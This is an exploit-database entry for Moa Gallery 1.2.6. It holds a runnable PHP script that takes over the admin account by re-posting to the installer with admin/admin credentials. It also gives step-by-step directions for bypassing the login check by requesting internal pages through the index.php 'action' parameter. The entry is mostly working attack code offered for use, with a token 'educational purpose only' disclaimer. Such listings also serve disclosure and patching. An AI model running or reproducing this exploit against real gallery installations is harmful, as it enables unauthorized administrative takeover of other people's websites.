Moa Gallery 1.2.6 Multiple Vulnerabilities

2013-05-18T00:00:00
ID 1337DAY-ID-20787
Type zdt
Reporter Slotleet
Modified 2013-05-18T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            #!/usr/bin/php
# Exploit Title : Moa Gallery 1.2.6 Multiple Vulnerabilities
# Date : 5/17/2013
# Author: Slotleet
# Slotleet () GMAIL com
# https://fb.com/Slotleet
# Vendor Homepage: http://www.moagallery.net/
# Version affected : 1.2.6
# Tested on: WIN 7 Xd4rk EDITION
# Greets : Faris , Sec4ever , Omleet-dz , RAB3OUN , b0x , Damane , Mohamed-bel , The Injector , Ahmad Ramahi , Ziad-dz , And Again Faris :P
#
# this was written for educational purpose only. use it at your own risk.
# `AUTHOR` will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Moe Gallery 1.2.6 Multiple Vulnerabilities
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~ [Add Admin] 

<?

error_reporting(0);
 
 
if ($argc < 3){
echo "+--------------------------------------+\n";
echo "+    Usage : $argv[0] localhost /moe/      +\n";
echo "+--------------------------------------+\n";
    die();
}
 
 
$site = $argv[1];
$dir = $argv[2];
 
$ch = curl_init("http://$site/$dir/install.php?stage=stage3a");
curl_setopt ($ch, CURLOPT_POST, true);
curl_setopt ($ch, CURLOPT_POSTFIELDS, "Moeuser=admin&Moepass=admin");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
 
$result = curl_exec($ch);
 
if ($result){
 
echo "+-------------------------------------===--+\n";
echo "+ Done ~ Username : Admin Password : Admin +\n";
echo "+--------------------------------===-------+\n";
 
}

?>

~ [Session Bypass]

1  // Redirect admin access for anyone not logged in
2  if ((!UserIsLoggedIn()) && (0 == strcmp(substr($action, 0, 5), 'admin')))
3  {
4    $action = 'login';
5  }
6  
7  switch($action)
8  {
9    case "admin" :
10    {
11      include_once("sources/page_admin.php");
12      break;
13    }
14    case "admin_ftp" :
15    {
16      include_once("sources/page_admin_ftp.php");
17      break;
18    }

look to line 2 theres a function called Userisloggedin to check if the admin logged in or not, but there's `ACTION` param that calls sources folder with switch and case :).
let's see if there's a UserIsLoggedIn() in those files :). 


  // Only proceed if a user is logged in
  if (!UserIsLoggedIn())
  {
Aahhh There is ;), i check those files, and we can bypass it by browsing (index.php?action=list here)

page_gallery_add.php
page_gallery_view.php
page_image_view.php
page_image_view_full.php
page_main_view.php
page_sitemap.php
page_slideshow.php
page_upgrade.php

we can browse it via (index.php?action=gallery_add) without (Page_) :)

./EOF

#  0day.today [2018-02-10]  #